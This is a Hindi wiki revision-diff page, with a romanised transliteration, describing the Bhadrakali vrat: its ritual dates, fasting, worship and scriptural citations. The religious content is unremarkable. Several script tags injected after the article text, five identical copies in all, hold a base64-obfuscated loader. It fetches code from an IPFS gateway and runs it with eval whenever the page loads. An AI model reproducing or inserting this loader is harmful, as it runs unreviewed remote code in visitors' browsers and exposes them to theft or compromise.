Difference between revisions of "भद्रकाली व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (भद्रकालीव्रत का नाम बदलकर भद्रकाली व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] [[प्रतिपदा]] पर प्रारम्भ होता है।  
 
*[[कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] [[प्रतिपदा]] पर प्रारम्भ होता है।  
 
*उस दिन [[उपवास]]; [[देवता]]; भद्रकाली (देवी भवानी) का पूजन किया जाता है।
 
*उस दिन [[उपवास]]; [[देवता]]; भद्रकाली (देवी भवानी) का पूजन किया जाता है।
 
*व्रत में एक [[वर्ष]] तक प्रति [[मास]] [[नवमी]] पर पूजा की जाती है।  
 
*व्रत में एक [[वर्ष]] तक प्रति [[मास]] [[नवमी]] पर पूजा की जाती है।  
 
*अन्त में किसी [[ब्राह्मण]] को दो वस्त्रों का दान करना चाहिए।  
 
*अन्त में किसी [[ब्राह्मण]] को दो वस्त्रों का दान करना चाहिए।  
*यह व्रत रोग मुक्ति, पुत्रों एवं यश की प्राप्ति के लिए किया जाता है <ref>हेमाद्रि (व्रत0 1, 960, विष्णुधर्मोत्तरपुराण 3|175|1-5 से उद्धरण)</ref>;
+
*यह व्रत रोग मुक्ति, पुत्रों एवं यश की प्राप्ति के लिए किया जाता है।<ref>हेमाद्रि (व्रत0 1, 960, विष्णुधर्मोत्तरपुराण 3|175|1-5 से उद्धरण</ref>
 
*[[आश्विन]] [[शुक्ल पक्ष|शुक्ल]] नवमी पर किया जाता है।  
 
*[[आश्विन]] [[शुक्ल पक्ष|शुक्ल]] नवमी पर किया जाता है।  
*दीवार या वस्त्र पर भद्रकाली का चित्र बना कर ; उनके आयुधों एवं ढाल की पूजा की जाती है।  
+
*दीवार या वस्त्र पर भद्रकाली का चित्र बना कर।
 +
*उनके आयुधों एवं ढाल की पूजा की जाती है।  
 
*[[नवमी]] को [[उपवास]] एवं भद्रकाली की पूजा की जाती है।  
 
*[[नवमी]] को [[उपवास]] एवं भद्रकाली की पूजा की जाती है।  
*ऐसी मान्यता है कि समृद्धि एवं सफलता की प्राप्ति होती है <ref>हेमाद्रि (व्रत0 1, 960-62, विष्णुधर्मोत्तरपुराण, 2|158|1-8 से उद्धरण</ref>; <ref>कृत्यरत्नाकर (350)</ref>; <ref>व्रतराज (337-338)</ref>
+
*ऐसी मान्यता है कि समृद्धि एवं सफलता की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 1, 960-62, विष्णुधर्मोत्तरपुराण, 2|158|1-8 से उद्धरण</ref>; <ref>कृत्यरत्नाकर (350</ref>; <ref>व्रतराज (337-338</ref>
*[[ब्रह्म पुराण]] <ref>ब्रह्मपुराण (181|46-53)</ref> में, जहाँ भद्रकाली को मदिरा एवं मांस दिये जाने का भी उल्लेख है।  
+
*[[ब्रह्म पुराण]]<ref>ब्रह्मपुराण (181|46-53</ref> में, जहाँ भद्रकाली को मदिरा एवं मांस दिये जाने का भी उल्लेख है।  
 
 
 
 
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl pratipada par prarambh hota hai.
  • us din upavas; devata; bhadrakali (devi bhavani) ka poojan kiya jata hai.
  • vrat mean ek varsh tak prati mas navami par pooja ki jati hai.
  • ant mean kisi brahman ko do vastroan ka dan karana chahie.
  • yah vrat rog mukti, putroan evan yash ki prapti ke lie kiya jata hai.[1]
  • ashvin shukl navami par kiya jata hai.
  • divar ya vastr par bhadrakali ka chitr bana kar.
  • unake ayudhoan evan dhal ki pooja ki jati hai.
  • navami ko upavas evan bhadrakali ki pooja ki jati hai.
  • aisi manyata hai ki samriddhi evan saphalata ki prapti hoti hai.[2]; [3]; [4]
  • brahm puran[5] mean, jahaan bhadrakali ko madira evan maans diye jane ka bhi ullekh hai.

 


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 1, 960, vishnudharmottarapuran 3|175|1-5 se uddharan
  2. hemadri (vrat0 1, 960-62, vishnudharmottarapuran, 2|158|1-8 se uddharan
  3. krityaratnakar (350
  4. vrataraj (337-338
  5. brahmapuran (181|46-53

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>